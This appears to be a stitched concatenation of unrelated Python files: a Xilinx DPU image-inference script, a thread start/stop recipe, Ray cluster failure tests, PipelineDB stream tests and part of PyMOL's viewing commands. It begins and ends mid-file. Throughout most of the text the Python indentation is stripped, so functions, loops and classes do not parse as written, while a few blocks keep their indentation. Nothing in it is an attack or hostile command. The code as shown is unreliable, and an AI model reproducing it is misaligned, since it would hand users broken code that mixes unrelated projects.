app.run(_main)
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
import shutil
# from scores import f1_score
divider = '------------------------------------'
def preprocess_fn(image_path, fix_scale):
"""
Image preprocessing. Convert float32 images into int8 images and scale them by a fix_scale factor
@return: the compiled .xmodel ready input image
"""
image = np.load(image_path)
image = image * fix_scale
image = image.astype(np.int8)
return image
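# Worked example of the scaling above, assuming the DPU reports a fix_point of 7 so that
# fix_scale = 2**7 = 128: a float32 pixel of 0.5 maps to int8 64 and 0.25 maps to 32, so the
# .npy inputs are presumably already normalised to roughly the [-1, 1) range.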
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id, start, dpu, img):
"""Single thread .xmodel inference process"""
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
ids = []
ids_max = 50
outputData = []
for i in range(ids_max):
outputData.append([np.empty(output_ndim, dtype=np.int8, order="C")])
while count < n_of_images:
if (count + batchSize <= n_of_images):
runSize = batchSize
else:
runSize = n_of_images - count
'''prepare batch input/output '''
inputData = []
inputData = [np.empty(input_ndim, dtype=np.int8, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData, outputData[len(ids)])
ids.append((job_id, runSize, start + count))
count = count + runSize
if count < n_of_images:
if len(ids) < ids_max - 1:
continue
for index in range(len(ids)):
dpu.wait(ids[index][0])
write_index = ids[index][2]
'''store output vectors '''
for j in range(ids[index][1]):
out_q[write_index] = outputData[index][0][j]
write_index += 1
ids = []
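# How runDPU() pipelines work (explanatory note, added): execute_async() queues a
# batch on the DPU and returns a job id immediately; each queued batch gets one of
# the ids_max pre-allocated output buffers. Once the queue is full (or every image
# has been submitted), wait() is called on each outstanding job id and its results
# are copied into the global out_q at the batch's starting image index, so the main
# thread can later match each prediction back to its file name in listimage.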
def app(image_dir, threads, model, save):
"""Runs the n-threads inference process"""
listimage = os.listdir(image_dir)
listimage = sorted(listimage)
listimage = listimage[:]
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
# input scaling
input_fixpos = all_dpu_runners[0].get_input_tensors()[0].get_attr("fix_point")
input_scale = 2 ** input_fixpos
''' preprocess images '''
print(divider)
print('Pre-processing', runTotal, 'images...')
img = []
target = []
for i in range(runTotal):
path = os.path.join(image_dir, listimage[i])
img.append(preprocess_fn(path, input_scale))
'''run threads '''
print('Starting', threads, 'threads...')
threadAll = []
start = 0
for i in range(threads):
if (i == threads - 1):
end = len(img)
else:
end = start + (len(img) // threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i, start, all_dpu_runners[i], in_q))
threadAll.append(t1)
start = end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(divider)
print("Throughput=%.2f fps, total frames = %.0f, time=%.4f seconds" % (fps, runTotal, timetotal))
''' post-processing '''
if save is True:
print('Saving ', len(out_q), ' predictions...')
try:
shutil.rmtree('predictions/')
except:
pass
os.makedirs('predictions', exist_ok=True)
assert len(listimage) == len(out_q)
for i in range(len(out_q)):
filename = 'pred_' + listimage[i]
np.save('predictions/' + filename, out_q[i])
print(divider)
return
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir', type=str, default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, default='bionet.xmodel',
                    help='Path of the .xmodel file. Default is bionet.xmodel')
ap.add_argument('-s', '--save', action='store_true',
help='Save predictions to directory predictions/ . Default is False')
args = ap.parse_args()
print('Command line options:')
print(' --image_dir : ', args.image_dir)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
print(' --save : ', args.save)
app(args.image_dir, args.threads, args.model, args.save)
if __name__ == '__main__':
main()
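# Example invocation (paths and model name are just the argparse defaults shown above):
#   python3 app_mt.py --image_dir images --threads 4 --model bionet.xmodel --save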
|
p01_start_stop_thread.py
|
import time
def countdown(n):
while n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
# Create and launch a thread
from threading import Thread
t = Thread(target=countdown, args=(10,))
t.start()
if t.is_alive():
print('Still running')
else:
print('Completed')
t.join()
t = Thread(target=countdown, args=(10,), daemon=True)
t.start()
class CountdownTask:
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
while self._running and n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
c = CountdownTask()
t = Thread(target=c.run, args=(10,))
t.start()
c.terminate() # Signal termination
t.join() # Wait for actual termination (if needed)
import socket
class IOTask:
    def __init__(self):
        self._running = True
    def terminate(self):
        self._running = False
    def run(self, sock):
        # sock is a socket
        sock.settimeout(5) # set timeout period
        while self._running:
            # Perform a blocking I/O operation w/ timeout
            try:
                data = sock.recv(8192)
                break
            except socket.timeout:
                continue
        # Continued processing
        # Terminated
        return
from threading import Thread
class CountdownThread(Thread):
def __init__(self, n):
super().__init__()
self.n = n
def run(self):
while self.n > 0:
print('T-minus', self.n)
self.n -= 1
time.sleep(5)
c = CountdownThread(5)
c.start()
import multiprocessing
c = CountdownTask()
p = multiprocessing.Process(target=c.run, args=(5,))
p.start()
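# Alternative sketch (added; not part of the original recipe): a threading.Event can
# replace the boolean flag, and Event.wait() lets the worker sleep without delaying
# shutdown when termination is signalled.
from threading import Event, Thread

def countdown_until_stopped(n, stop_evt):
    while n > 0 and not stop_evt.is_set():
        print('T-minus', n)
        n -= 1
        stop_evt.wait(5)   # wakes up early if the event gets set

stop_evt = Event()
t = Thread(target=countdown_until_stopped, args=(10, stop_evt))
t.start()
stop_evt.set()             # signal termination
t.join()                   # wait for actual termination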
|
test_failure_2.py
|
import json
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
import pytest
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray._private.utils
from ray.util.placement_group import placement_group
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray._private.test_utils import (init_error_pubsub, get_error_message,
Semaphore, wait_for_condition)
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# Placement group cannot be made, but no warnings should occur.
total_cpus = ray.cluster_resources()["CPU"]
# Occupy one cpu by an actor
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
print(a)
@ray.remote(num_cpus=total_cpus)
def g():
pass
pg = placement_group([{"CPU": total_cpus}], strategy="STRICT_PACK")
g.options(placement_group=pg).remote()
errors = get_error_message(
p, 1, ray_constants.INFEASIBLE_TASK_ERROR, timeout=5)
assert len(errors) == 0, errors
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
a = Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
del a
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 10)]
assert len(actor_group1) == num_cpus * 10
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group2) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray._private.import_thread.logger.
# However, I didn't find a good way to capture the output for all loggers
# simultaneously.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(object_ref)
thread.join()
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray._private.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
with pytest.raises(Exception):
cluster.add_node(wait=False, node_manager_port=redis_port)
p = log_pubsub
cnt = 0
# wait for max 10 seconds.
found = False
while cnt < 1000 and not found:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray._private.utils.decode(msg["data"]))
if data["pid"] == "raylet":
found = any("Failed to start the grpc server." in line
for line in data["lines"])
assert found
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
test_pipeline_funcs.py
|
from base import async_insert, pipeline, clean_db
import getpass
import psycopg2
import threading
import time
def test_combine_table(pipeline, clean_db):
pipeline.create_stream('s', x='int')
pipeline.create_cv('combine_table',
'SELECT x::int, COUNT(*) FROM s GROUP BY x')
  values = [(i,) for i in range(1000)]
pipeline.insert('s', ('x',), values)
pipeline.execute('SELECT * INTO tmprel FROM combine_table_mrel')
stop = False
ninserts = [0]
def insert():
while not stop:
pipeline.insert('s', ('x',), values)
ninserts[0] += 1
time.sleep(0.01)
t = threading.Thread(target=insert)
t.start()
time.sleep(2)
conn = psycopg2.connect('dbname=postgres user=%s host=localhost port=%s' %
(getpass.getuser(), pipeline.port))
cur = conn.cursor()
cur.execute("SELECT pipelinedb.combine_table('combine_table', 'tmprel')")
conn.commit()
conn.close()
stop = True
t.join()
assert ninserts[0] > 0
rows = list(pipeline.execute('SELECT count FROM combine_table'))
assert len(rows) == 1000
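  # Each group's final count should be: 1 from the initial insert, plus ninserts[0]
  # from the background thread, plus 1 combined back in from the tmprel snapshot.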
for row in rows:
assert row[0] == ninserts[0] + 2
pipeline.execute('DROP TABLE tmprel')
def test_combine_table_no_groups(pipeline, clean_db):
pipeline.create_stream('s', x='int')
pipeline.create_cv('no_groups', 'SELECT COUNT(*) FROM s')
  values = [(i,) for i in range(1000)]
pipeline.insert('s', ('x',), values)
pipeline.execute('SELECT * INTO tmprel FROM no_groups_mrel')
pipeline.execute("SELECT pipelinedb.combine_table('no_groups', 'tmprel')")
rows = pipeline.execute('SELECT count FROM no_groups')
assert len(rows) == 1
assert len(rows[0]) == 2
assert rows[0][0] == 2000
def test_pipeline_flush(pipeline, clean_db):
pipeline.execute('SET pipelinedb.stream_insert_level=async')
pipeline.create_stream('s', x='int')
pipeline.create_cv('flush', 'SELECT x, cq_sleep(0.01) FROM s')
  values = [(i,) for i in range(1000)]
start = time.time()
# This will take 0.01 * 1000 = 10s to process but return immediately since
# inserts are async and values will fit in one batch.
pipeline.insert('s', ('x',), values)
insert_end = time.time()
pipeline.execute('SELECT pipelinedb.flush()')
flush_end = time.time()
assert insert_end - start < 0.1
assert flush_end - start > 10
row = list(pipeline.execute('SELECT count(*) FROM flush'))[0]
assert row[0] == 1000
pipeline.execute('SET pipelinedb.stream_insert_level=sync_commit')
|
viewing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-* Filipe Maia (slicing code)
#-*
#-*
#Z* -------------------------------------------------------------------
from . import colorprinting
if True:
import sys
import threading
import pymol
from . import selector
import copy
from . import parsing
import re
cmd = sys.modules["pymol.cmd"]
from .cmd import _cmd, Shortcut, \
_feedback,fb_module,fb_mask, \
repres,repres_sc, is_string, is_list, \
repmasks,repmasks_sc, \
toggle_dict,toggle_sc,stereo_dict,stereo_sc, \
palette_dict, palette_sc, window_dict, window_sc, \
safe_list_eval, safe_alpha_list_eval, \
location_code, location_sc, boolean_dict, boolean_sc, \
DEFAULT_ERROR, DEFAULT_SUCCESS
palette_colors_dict = {
'rainbow_cycle' : 'magenta blue cyan green yellow orange red magenta',
'rainbow_cycle_rev' : 'magenta red orange yellow green cyan blue magenta',
'rainbow' : 'blue cyan green yellow orange red',
'rainbow_rev' : 'red orange yellow green cyan blue',
'rainbow2' : 'blue cyan green yellow orange red',
'rainbow2_rev' : 'red orange yellow green cyan blue',
'gcbmry' : 'green cyan blue magenta red yellow',
'yrmbcg' : 'yellow red magenta blue cyan green',
'cbmr' : 'cyan blue magenta red',
'rmbc' : 'red magenta blue cyan',
}
rep_list = [ "lines", "sticks", "spheres", "dots", "surface",
"mesh", "nonbonded", "nb_spheres", "cartoon",
"ribbon", "labels", "slice", "ellipsoids", "volume" ]
scene_action_sc = Shortcut(['store','recall','clear','insert_before',
'insert_after','next','previous',
'start', 'update','rename','delete',
'order', 'sort', 'first',
'append'])
scene_action_dict = {}
scene_action_dict_sc = Shortcut([])
view_sc = Shortcut(['store','recall','clear'])
def zoom(selection="all", buffer=0.0, state=0, complete=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"zoom" scales and translates the window and the origin to cover the
atom selection.
USAGE
zoom [ selection [, buffer [, state [, complete [, animate ]]]]]
EXAMPLES
zoom
zoom complete=1
zoom 142/, animate=3
zoom (chain A)
ARGUMENTS
selection = string: selection-expression or name pattern {default: all}
buffer = float: distance {default: 0}
state = 0: uses all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
    complete = 0 or 1: will ensure that no atom centers are clipped
animate < 0: uses the default animation duration
animate = 0: no animation
animate > 0: animates using the provided duration in seconds
PYMOL API
cmd.zoom(string selection, float buffer, int state, int complete,
int animate)
NOTES
The zoom command normally tries to guess an optimal zoom level for
visualization, balancing closeness against occasional clipping of
atoms out of the field of view. You can change this behavior by
setting the complete option to 1, which will guarantee that the
atom positions for the entire selection will fit in the field of
an orthoscopic view.
To absolutely prevent clipping, you may also need to add an
additional buffer (typically 2 A) to account for graphical
representations which extend beyond the atom coordinates.
SEE ALSO
origin, orient, center
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.zoom(_self._COb,str(selection),float(buffer),
int(state)-1,int(complete),float(animate))
return r
def center(selection="all", state=0, origin=1, animate=0, *, _self=cmd):
'''
DESCRIPTION
"center" translates the window, the clipping slab, and the
origin to a point centered within the atom selection.
USAGE
center [ selection [, state [, origin [, animate ]]]]
EXAMPLES
center chain B
center 145/
ARGUMENTS
selection = string: selection-expression or name pattern (default: "all").
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
origin = 1 (default) move the origin
origin = 0 leave the origin unchanged
PYMOL API
cmd.center(string selection, int state, int origin)
SEE ALSO
origin, orient, zoom
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.center(_self._COb,str(selection),int(state)-1,int(origin),float(animate))
return r
clip_action_sc = Shortcut([ 'near','far','move','slab','atoms' ])
def clip(mode, distance, selection=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"clip" alters the positions of the clipping planes.
USAGE
clip mode, distance [, selection [, state ]]
ARGUMENTS
mode = near, far, move, slab, or atoms
distance is a floating point value
selection = atom selection (for mode=atoms only)
EXAMPLES
clip near, -5 # moves near plane away from you by 5 A
clip far, 10 # moves far plane towards you by 10 A
clip move, -5 # moves the slab away from you by 5 A
clip slab, 20 # sets slab thickness to 20 A
clip slab, 10, resi 11 # clip 10 A slab about residue 11
clip atoms, 5, pept # clip atoms in "pept" with a 5 A buffer
# about their current camera positions
PYMOL API
cmd.clip(string mode, float distance, string selection, int state)
SEE ALSO
zoom, orient, reset
'''
mode = clip_action_sc.auto_err(str(mode),'mode')
if selection is not None:
selection = selector.process(selection)
else:
selection = ''
with _self.lockcm:
r = _cmd.clip(_self._COb,str(mode),float(distance),
str(selection),int(state)-1)
return r
def origin(selection="(all)", object=None, position=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"origin" sets the center of rotation about a selection. If an
object name is specified, it can be used to set the center of
rotation for the object (for use in animation and editing).
USAGE
origin [ selection [, object [,position, [, state ]]]]
ARGUMENTS
selection = string: selection-expression or name-list {default: (all)}
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
EXAMPLES
origin chain A
origin position=[1.0,2.0,3.0]
PYMOL API
cmd.origin(string object-or-selection)
SEE ALSO
zoom, orient, reset
'''
#'
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
if object is None: object=''
if position is None: position=(0.0,0.0,0.0)
else:
if _self.is_string(position):
position = safe_list_eval(position)
selection = ''
r = _cmd.origin(_self._COb,selection,str(object),
(float(position[0]),
float(position[1]),
float(position[2])
),int(state)-1)
return r
def orient(selection="(all)", state=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"orient" aligns the principal components of the atoms in the
selection with the XYZ axes.
USAGE
orient [ selection [, state [, animate ]]]
ARGUMENTS
selection = a selection-expression or name-pattern {default: (all)}
state = 0: use all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
EXAMPLES
orient organic
NOTES
The function is similar to the orient command in X-PLOR.
PYMOL API
cmd.orient(string object-or-selection, int state, float animate)
SEE ALSO
zoom, origin, reset
'''
# preprocess selection
selection = selector.process(selection)
with _self.lockcm:
return _cmd.orient(_self._COb,"("+selection+")",int(state)-1,float(animate))
def move(axis, distance, *, _self=cmd):
'''
DESCRIPTION
"move" translates the camera about one of the three primary axes.
USAGE
move axis, distance
EXAMPLES
move x, 3
move y, -1
PYMOL API
cmd.move(string axis, float distance)
SEE ALSO
turn, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
return _cmd.move(_self._COb,str(axis),float(distance))
def enable(name='all', parents=0, *, _self=cmd):
'''
DESCRIPTION
"enable" turns on display of one or more objects and/or selections.
USAGE
enable name
ARGUMENTS
name = name-pattern or selection.
NOTES
If name matches a selection name, then selection indicator dots
are shown for atoms in that selection. If name is a
selection-expression, then all objects with atoms in that
selection are enabled.
For an object\'s content to be displayed in the 3D viewer, the
object must be enabled AND at least one of the available
representations must be shown.
PYMOL API
cmd.enable(string object-name)
EXAMPLES
enable target_protein # enables the target_protein object
enable 1dn2.* # enables all entities starting with 1dn2.
enable *lig # enables all entities ending with lig
SEE ALSO
show, hide, disable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,1)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),1,int(parents));
return r
def disable(name='all', *, _self=cmd):
'''
DESCRIPTION
"disable" turns off display of one or more objects and/or selections.
USAGE
disable name
ARGUMENTS
name = name-pattern or selection.
PYMOL API
cmd.disable(string name)
SEE ALSO
show, hide, enable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,0)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),0,0);
return r
def _rep_to_repmask(rep):
repn = 0
for rep in rep.split():
rep = repmasks_sc.auto_err(rep, 'representation')
repn |= repmasks[rep]
return repn
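# For example, _rep_to_repmask("lines sticks") ORs the masks of both representations;
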